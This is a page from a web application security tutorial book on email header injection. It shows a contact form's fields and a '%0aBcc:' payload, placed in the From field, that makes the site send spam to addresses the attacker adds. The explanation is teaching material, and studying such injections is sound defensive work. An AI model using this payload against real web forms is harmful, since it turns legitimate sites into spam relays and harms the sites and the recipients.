Web application security - the fast guide 1.1 | Page 145

Chapter 7 - Attack execution (3)
P a g e | 145
Attack process:
the original form listing is as follow:
To: admin@vulnerableSite.com
From: legitimateUser@legitimateServer.com
Subject: Site problem
Confirm Order page doesn’t load
Attacker will simply add bcc header to the user email address and the same
message will be sent to the set addresses.
%0aBcc:theSpamVitim@spammedCompany.com
And can add the spam message contents, thus the full SMTP request will be as
follow
To: admin@vulnerableSite.com
From:
whatever@whateverServer.com%0aBcc:theSpamVitim@spammedCompany.co
m
Subject: SPAAAAAM SUBBJECT
Hello dear receiver this Is the spam message contents.